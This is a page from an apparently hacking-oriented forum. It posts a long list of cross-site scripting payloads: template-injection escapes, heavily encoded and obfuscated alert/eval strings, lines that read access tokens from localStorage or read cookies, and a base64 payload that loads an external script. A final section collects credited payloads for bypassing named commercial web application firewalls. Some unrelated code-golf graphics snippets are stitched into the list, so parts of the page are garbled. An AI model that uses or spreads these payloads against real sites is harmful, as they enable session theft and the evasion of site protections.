Hobby
29

test






  04-Jan-2023 01:11:20



/*-/*`/*\`/*'/*"/**/(/* */=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/=alert()//>\x3e
{{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(document.domain)//’);}} )
{{constructor.constructor('alert(1)')()}}                          
{{this.construct.construct('alert("foo")')()}}
alert(localStorage.getItem('access_token'))   
asdf%22%20\=alert`1`;%             
asdf%22;alert`1`;//                           
<img src=x>’”${7*7}                           
<svg%0Aonauxclick=0;[1].some(confirm)//        
[img]http://server/x.jpg"=="//google.com[/img]         
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();                                  
//%250athrow%20on{err}o}r=a{ler}t,1337                   
<body/=foo=[123,666,999]>               
"/=(alert)(1)//                        
<object/data="/**/(document.domain)">//                     
'\141\154\145\162\164\50\61\51'instanceof{[Symbol.hasInstance]:eval}             
<style>@im\\port'\\ja\\vasc\\ript:alert(\\\"XSS"\\\")';</style>                  
%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx                                  
<svg id=alert(1337) =eval(id)>                                             
<svg id=(1337) =location=id>                               
[]?.findIndex?.(dump)+('<input =alert(1) autofocus>');                    
x=this?.[[]?.x??/a/.source+'\x6c'+13439..toString?.(30)],[1]?.findIndex?.(x);     
([]?.x??alert)(1);                                                    
Window.dump(alert(1))                         
<svg><x>alert&#40;7&#41</x>           
"><video><source =eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JIYXRIRWxlbWVudCgic2NyaXB0lik7YS5zcmM9Lmh0dHBzOi8vYXLkaW5ueXVudXMueHNzL>
1&quot;Style=&quot;position:fixed;top:0;left:0;font-size:999px;&quot;=&quot;(confirm)(1)&quot;                 
<Svg%K9=%7Krompt%6K1%6K>
-self[Object.keys(self)[6]] (document.d\u006Fmain)-
<svg ="alert(1)">
</title><!--><svg %3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst%26%23114;%26lpar;1>#(document.domain)
%252522-alert%252528%252529-%252522
<form action="(document.domain)"><input type=submit>
%26apos;,alert%26lpar;1%26rpar;//
'-alert(1)'
"-alert(1)-"
<svg/=alert(1)//
<sVg/=alert(1)//
*/alert(1)/*
%253cscript%253ealert%25281%2529%253c%252fscript%253e
%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e
" ="alert(1)" accesskey="x
alert(1)
" onx=[] =prompt(2)>
" onx={} =prompt(2)>
" onx=() =prompt(2)>
asdf‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’ asdf `-
Function`self[‘a’+’l’+’e’+’r’+’t’](1)```-’
“}< svg&#x09;x/ =&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000100&#0000111&#0000109&#0000097&#0000105&#0000110&#0000041>
“}%3c%25%30%30%73%76%67%26%23%78%30%39%3b%78%2f%25%30%30%6f%6e%6c%6f%61%64%3d%26%23%30%30%30%30%30%39%37%26%23%30%30%30%30%31%30%38%26%23%30%30%30%30%31%30%31%26%23%30%30%30%30%31%31%34%26%23%30%30%30%30%31%31%36%26%23%30%30%30%30%30%34%30%26%23%30%30%30%30%31%30%30%26%23%30%30%30%30%31%31%31%26%23%30%30%30%30%30%39%39%26%23%30%30%30%30%31%31%37%26%23%30%30%30%30%31%30%39%26%23%30%30%30%30%31%30%31%26%23%30%30%30%30%31%31%30%26%23%30%30%30%30%31%31%36%26%23%30%30%30%30%30%34%36%26%23%30%30%30%30%31%30%30%26%23%30%30%30%30%31%31%31%26%23%30%30%30%30%31%30%39%26%23%30%30%30%30%30%39%37%26%23%30%30%30%30%31%30%35%26%23%30%30%30%30%31%31%30%26%23%30%30%30%30%30%34%31%3e
”><iframe/src=javascript&colon;[document&period;domain].find(alert)>
"><a href=”javascript&colon;alert&lpar;document&period;domain&rpar;”>Click Here</a>
123%3Ca+href%3Djav%26%23x09%3Bascript%3Aprom%26%23x09%3Bpt%28doc%26%23x09%3Bument.coo%26%23x09%3Bkie%29%3B%3Easdasdas%3C%2Fa%3E
eyJuYW1lIjogIlRlc3QgSGFja2VyT25lIiwgInN0YXJ0X2RhdGUiOiAiMDEuMDEuMjAxOCIsICJsZWFucGx1bV9pZCI6ICJ0ZXN0IiwgInJpZGVzIjogIjIwMCIsICJwbGFjZXMiOiAiMjAiLCAiZGlzdGFuY2UiOiA1MDAsICJjYW5jZWxfdGltZXMiOiAiMCIsICJkYXlzIjogIjEwMCIsICJwcm9tb19jb2RlIjogImphdmFzY3JpcHQ6Ly9yLmdyYWIuY29tL3Rlc3QlMGFhbGVydChkb2N1bWVudC5kb21haW4pIiwgInByZl9yZXdhcmQiOiAiMTAifQ==
(atob(`PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`));
();
<div style="width:1000px;height:1000px" =alert()></div>
<marquee width=10 loop=2 behavior="alternate" =alert()>
<marquee =alert(1)>
<marquee loop=1 width=0 =alert(1)>
<input autofocus="" =alert(1)></input>
<details open ="alert()">
<video autoplay start="alert()" src=x></video>
<video autoplay controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls eddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls edmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls start="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls start="alert()"><source src=x></video>
<video controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<audio autoplay controls ="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<audio autoplay controls ing="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<style>@keyframes x {}</style><p style="animation: x;" ="alert()">XSS</p><p style="animation: x;" ="alert()">XSS</p>
<svg><animate =alert() attributeName=x></svg>
<object data="data:text/html,">
<iframe srcdoc="<svg >">
<object data=(3)>
<iframe src=(2)>
<embed src=(1)>
<embed src="PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<svg>alert(1)-%26apos%3B
anythinglr00alert(document.domain)uxldzanythinglr00%3c%2fscript%3e<object data='PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
<a href=javas&#99;ript:alert(1)>
%2sscript%2ualert()%2s/script%2u
<style>@KeyframeS x{}</style><xss style="animation-name:x" ="alert(1)"></xss>
<a/href="'earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
=alert&#x00000000028;1&#x00000000029; autofocus>
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}}
{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}}
{{[]."-alert`1`-"}}
{{$on.constructor{'&bsol;&bsol;u&bsol;u007b61}lert`1`')()}}
<svg =prompt%26%230000000040document.domain)>
<svg =prompt%26%23x000000028;document.domain)>
X(S,D)I=ivec3(S);D=fract(float(I.x^I.y^I.z)*PI vec3 p;float d=1.,h,H;ivec3 I;for(;h<9.&&d>.9;){p=vec3((FC.xy-r)/r.y,1)*h+vec3(0,2,t);X(p*4.,H)*.9);d=p.y-pow(H,20.);h+=.01;}X(p*1e2,d)+t*.1);http://o.xyz=p*pow(d,1e2)+h/18.;
'alert(1)'.match({__proto__:RegExp.prototype,global:1,unicode:1,exec:eval})
<svg =alert%26%230000000040"1")>
w=t=640,draw=_=>{createCanvas(w,w);loadPixels() for(t++,q=y=w/4;y--;)for(x=q;x--;)(t-y-x^t-y+x)**sqrt(2)%33<(x+y)/19&&set(x,y,0) updatePixels();clear(g=get(0,0,q,q));image(g,0,0,w,w)}
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
<math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title="</style>"></style></h1>br>-->#"(1)
-->#"(1)
-->#"(1)
"><body/=prompt(1)>
"><a href="javasciript:throw 1337">
<\ "\/*'\/*></Title\/<\/Script\/--><svg\/**\/%3B =(alert)(1)\/\/>#asdf"}
"><Svg/=top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])>
"><Svg+Onx=()+=alert?.(domain)>
1\47\42\55\55\41\76\74Img\40Src\40\75confirm\140\113\140\76
1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]//
//%250Dtop.confirm(1)//?1
<Img Src=//X55.is =import(src)>
alert?.(document?.domain)[document?.domain]?.map?.(alert)
top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])
%EF%BC%9C/script%ef%bc%9e%EF%BC%9Cscript%ef%bc%9econfirm%601%60%EF%BC%9C/script%ef%bc%9e
"><On click=prompt()>
"><img sr c=x o nerror=prompt()>
"><On mouseover=prompt()>
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!confirm(1)

@black0x00mamba | Bypass WAF Akamaighost & filtered , , href, src, , script, etc
<img  sr c=x o nerror=((pro mpt(1)))>

DotDefender WAF bypass by @0xInfection
<bleh/start=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src=' '>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.

@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg \r\n=$.globalEval("al"+"ert()");>

@rodolfoassis | Wordfence 7.4.2
<a href=&#01(1)>

rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="(1)">

*Beware click the link!


DISCUSSION
Nothing comment here :(
Login for comment and discussion.
Login Here
Sponsored

Oppss... No sponsors yet

Popular Posts
Complete Basic Course in Kali...
Djie sam soe Djie sam soe
Linux
13410
3
Top

Gps Tracker Seccodeid Free Too...
Djie sam soe Djie sam soe
General
12721
173
Top

Free Proxy List
Sandidi Sandidi
Networking
3270
3
Top

Komintod (Ministry of Communic...
Murtad methamphetamine Murtad methamphetamine
Data Leak
2897
52
Top

Mass Reverse IP Unlimited
ImamWawe ImamWawe
Tools Hacking
2759
13
Top

Related Post

Youtube Video

Subscribe